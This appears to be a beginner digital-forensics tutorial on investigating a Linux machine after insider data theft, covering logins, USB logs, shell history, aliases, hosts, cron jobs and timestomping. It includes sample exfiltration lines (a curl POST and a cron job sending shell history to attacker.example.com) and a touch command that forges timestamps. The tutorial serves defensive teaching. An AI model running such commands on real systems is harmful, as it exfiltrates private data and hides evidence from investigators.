Welcome back, aspiring DFIR investigators!
Linux machines are everywhere these days, running quietly in the background while powering the most important parts of modern companies. They host databases, file shares, internal tools, email services, and countless other systems that businesses depend on every single day. But the same flexibility that makes Linux so powerful also makes it attractive for attackers. A simple bash shell provides everything someone needs to move files around, connect to remote machines, or hide traces of activity. That is why learning how to investigate Linux systems is so important for any digital forensic analyst.
In an earlier article we walked through the basics of Linux forensics. Today, we will go a step further and look at a scenario where a personal Linux machine was used to exfiltrate private company data. The employee worked for the organization that suffered the breach. Investigators first examined his company-issued Windows workstation and discovered several indicators tying him to the attack. However, the employee denied everything and insisted he was set up, claiming the workstation wasn’t actually used by him. To uncover the truth and remove any doubt, the investigation moved to his personal machine, a Linux workstation suspected of being a key tool in the data theft.
Analysis
It is a simple investigation designed for those who are just getting started.
Evidence
Before looking at anything inside the disk, a proper forensic workflow always begins with hashing the evidence and documenting the chain of custody. After that, you create a hashed forensic copy to work on so the original evidence remains untouched. This is standard practice in digital forensics, and it protects the integrity of your findings.
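As a minimal sketch (the image filename here is hypothetical), hashing the original and verifying the working copy might look like this:
bash# > sha256sum suspect_disk.img | tee suspect_disk.img.sha256
bash# > dd if=suspect_disk.img of=working_copy.img bs=4M status=progress
bash# > sha256sum working_copy.img

The hash of the copy must match the recorded original before any analysis begins.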

Once we open the disk image, we can see the entire root directory. To keep the focus on the main points, we will skip the simple checks covered in Basic Linux Forensics (OS-release, groups, passwd, etc.) and move straight into the artifacts that matter most for a case involving exfiltration.
Last Login
The first thing we want to know is when the user last logged in. Normally you can run last with no arguments on a live system, but here we must point it to the wtmp file manually:
bash# > last -f /var/log/wtmp

This shows the latest login from the GNOME login screen, which occurred on February 28 at 15:59 (UTC).
To confirm the exact timestamp, we can check authentication events stored in auth.log, filtering only session openings from GNOME Display Manager:
bash# > cat /var/log/auth.log | grep -ai "session opened" | grep -ai gdm | grep -ai liam

From here we learn that the last GUI login occurred at 2025-02-28 10:59:07 (local time).
Timezone
Next, we check the timezone to ensure we interpret all logs correctly:
bash# > cat /etc/timezone

This helps ensure that timestamps across different logs line up properly.
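Note that /etc/timezone is specific to Debian-based systems. On many other distributions, the /etc/localtime symlink points into /usr/share/zoneinfo and reveals the same information:
bash# > ls -l /etc/localtime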
USB
Data exfiltration often involves external USB drives. Some attackers simply delete their shell history, thinking that alone is enough to hide their actions. But they often forget that Linux logs almost everything, and those logs tell the truth even when the attacker tries to erase evidence.
To check for USB activity:
bash# > grep -i usb /var/log/*

Many entries appear, and buried inside them is a serial number from an external USB device.

Syslog also records the exact moment this device was connected. Using the timestamp (2025-02-28 at 10:59:25) we can filter the logs further and collect more detail about the device.
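For example, assuming the classic syslog timestamp format, we can narrow the search to the minute the device appeared:
bash# > grep -ai "Feb 28 10:59" /var/log/syslog | grep -i usb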

We also want to know when it was disconnected:
bash# > grep -i usb /var/log/* | grep -ai disconnect

The last disconnect occurred on 2025-02-28 at 11:44:00. This gives us a clear time window: the USB device was connected for about 45 minutes. Long enough to move large files.
Command History
Attackers use different tricks to hide their activity. Some delete .bash_history. Others only remove certain commands. Some forget to clear it entirely, especially when working quickly.
Here is the user’s history file:
bash# > cat /home/liam/.bash_history

Here we see several suspicious entries. One of them is transferfiles. This is not a real Linux command, which immediately suggests it might be an alias. There is also a hidden directory and a mysterious mth file, which we will explore later. Finally, we see a curl -X POST command, which hints that data was uploaded to an HTTP server, a classic exfiltration method.
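The exact upload command belongs to the case evidence, but a hedged sketch of this kind of exfiltration (the destination URL and archive name are hypothetical) looks like:
bash# > curl -X POST -F "data=@/home/liam/Documents/Data/archive.tar.gz" http://attacker.example.com/upload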
Malicious Aliases
Hackers love aliases because they let them hide malicious commands behind innocent-looking names. For example, instead of typing out a long scp or rsync command that would look suspicious in a history file, they can simply create an alias like backup, sync, or transferfiles. To anyone reviewing the history later, it looks harmless. Aliases also help them blend into the environment. A single custom alias is easy to overlook during a quick review, and some investigators forget to check dotfiles for custom shell behavior.
To see what transferfiles really does, we search for it:
bash# > grep -r "transferfiles" .

This reveals the real command: it copied the entire folder “Critical Data TECH*” from a USB device labeled 46E8E28DE8E27A97 into /home/liam/Documents/Data.
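Based on that finding, the recovered alias definition would have looked roughly like the sketch below. The exact mount point is an assumption; removable drives are typically automounted under /media/<user>/<label>:
bash# > alias transferfiles='cp -r "/media/liam/46E8E28DE8E27A97/Critical Data TECH"* /home/liam/Documents/Data/'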

This aligns perfectly with our earlier USB evidence. Files such as Financial Data, Revenue History, Stakeholder Agreement, and Tax Records were all transferred. Network logs suggest more files were stolen, but these appear to be the ones the suspect personally inspected.
Hosts
The /etc/hosts file is normally used to map hostnames to IP addresses manually. Users sometimes add entries to simplify access to internal services or testing environments. However, attackers also use this file to redirect traffic or hide the true destination of a connection.
Let’s inspect it:
bash# > cat /etc/hosts

In this case, there is an entry pointing to a host involved in the exfiltration. This tells us the suspect had deliberately configured the system to reach a specific external machine.
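Such an entry follows the standard hosts format, an IP address followed by one or more hostnames. The values below are placeholders, not the real indicator from this case:
203.0.113.45    exfil.example.com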
Crontabs
Crontabs are used to automate tasks. Many attackers abuse cron to maintain persistence, collect information, or quietly run malicious scripts.
There are three main places cron jobs can exist:
1. /etc/crontab – system-wide
2. /etc/cron.d/ – service-style cron jobs
3. /var/spool/cron/crontabs/ – user-specific entries
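A quick way to sweep all three locations at once on a mounted image (paths shown as if the image root were /) is a simple loop:
bash# > for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*; do echo "== $f =="; cat "$f"; done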
Let’s check the user’s crontab:
bash# > cat /var/spool/cron/crontabs/liam

We can see a long command string scheduled to run every 30 minutes. This cronjob secretly sends the last five commands typed in the terminal to an attacker-controlled machine. That includes passwords typed in plain text, sudo commands, sensitive paths, and anything else the user entered recently.
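The exact payload is part of the case evidence, but a plausible reconstruction of such an entry (the destination is hypothetical) could look like:
*/30 * * * * tail -n 5 /home/liam/.bash_history | curl -s -X POST --data-binary @- http://attacker.example.com/keys

Keep in mind that .bash_history is normally flushed only when a shell exits, so a real implant may harvest commands more aggressively; the sketch only illustrates the mechanism.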
This was unexpected. It suggests the system was accessed by someone else, meaning the main suspect may have been working with a third party, or was possibly being monitored and guided by them.
To confirm this possibility, let’s check for remote login activity:
bash# > cat /var/log/auth.log | grep -ai accepted

Here we find a successful SSH login from an external IP address. This could be that unidentified person entering the machine to retrieve the stolen data or to set up additional tools. At this stage it’s difficult to make a definitive claim, and we would need more information and further interrogation to connect all the pieces.
Commands and Logins in auth.log
The auth.log file stores not only authentication attempts but also certain command-related records, such as commands executed through sudo. This is extremely useful when attackers use hidden directories or unusual locations to store files.
To list all logged commands:
bash# > cat /var/log/auth.log | grep -ai command
To search for one specific artifact:
bash# > cat /var/log/auth.log | grep -ai mth

This tells us that the file mth was created in /home/liam using nano by user liam. Although this file contained nothing valuable, its creation shows the user was active and writing files manually, rather than through automated tools.
Timestomping
As a bonus step, we will take a closer look at timestamps, which are essential in forensic work. They help investigators understand the sequence of events and uncover attempts at manipulation that might otherwise go unnoticed. Timestomping is the practice of deliberately altering file timestamps to confuse investigators. Hackers use it to hide when a file was created or modified. However, Linux keeps several different timestamps for each file, and they don’t always match when something has been tampered with.
The stat command helps reveal inconsistencies:
bash# > stat api

The output shows:
Birth: Feb 28 2025
Change: Nov 17 2025
Modify: Jan 16 2001
This does not make sense: a file cannot have been modified in 2001 when it was not created until 2025. That means the timestamps were manually altered. A normal file’s timestamps follow a logical order, with creation preceding modification. By comparing these values across many files, investigators can often uncover when an attacker attempted to clean up their traces or disguise their activity.
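This is also why the change time is so valuable: utilities such as touch can rewrite access and modification times, but the kernel updates ctime whenever the inode changes, and touch cannot set it directly. A quick demonstration:
bash# > touch -t 200101161200 api
bash# > stat api

After this, the modify time shows January 16 2001, but the change time jumps to the moment the command ran, exposing the manipulation.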
Timeline
The investigation still requires more evidence, deeper log correlation, and proper interrogation of everyone involved before a final conclusion can be made. However, based on the artifacts recovered from the Linux machine, we can outline a reasonable reconstruction of how the events might have taken place.
In the days before the breach, Liam was approached by a third-party group interested in acquiring his company’s confidential data. They gained remote access to his computer via SSH, possibly through a proxy, appearing to log in from a public IP address that does not belong to the company network. Once inside, they installed a cronjob that acted as a simple keylogger, collecting Liam’s recent terminal commands. This allowed them to gather passwords and other sensitive information that Liam typed in the terminal.
With Liam’s cooperation, or possibly after promising him payment, the attackers guided him through the steps needed to steal the corporate files. On February 28, Liam logged in, connected a USB drive, and executed the hidden alias transferfiles, which copied sensitive folders onto his machine. Moments later, he uploaded parts of the data using a curl POST request to a remote server. When the transfer was done, the accomplices disconnected from the machine, leaving Liam with remnants of stolen data still sitting inside his Documents directory.
The combination of the installed cronjob, the remote SSH connection, and the structured method of transferring company files strongly suggests an insider operation supported by outside actors. Liam was not acting alone; he was assisting a third party, either willingly or under pressure.
Summary
The hardest part of digital forensics is interpreting what the evidence actually means and understanding the story it tells. Individual logs rarely show the full picture by themselves. But when you combine login times, USB events, alias behavior, cronjobs, remote connections, and other artifacts, a clear narrative begins to form. In this case, the Linux machine revealed far more than the suspect intended. It showed how the data was copied, when the USB device was attached, how remote actors accessed the system, and even how attempts were made to hide the tracks through timestomping and aliases. Each artifact strengthened the overall story and connected the actions into one coherent timeline. This is the true power of digital forensics: turning fragments of technical evidence into a readable account of what really happened. And with every investigation, your ability to find and interpret these traces grows stronger.
If you want skills that actually matter when systems are burning and evidence is disappearing, this is your next step. Our training takes you into real investigations, real attacks, and real analyst workflows. Built for people who already know the basics and want to level up fast, it’s on-demand, deep, and constantly evolving with the threat landscape.
Source: HackersArise
Source Link: https://hackers-arise.com/digital-forensics-basic-linux-analysis-after-data-exfiltration/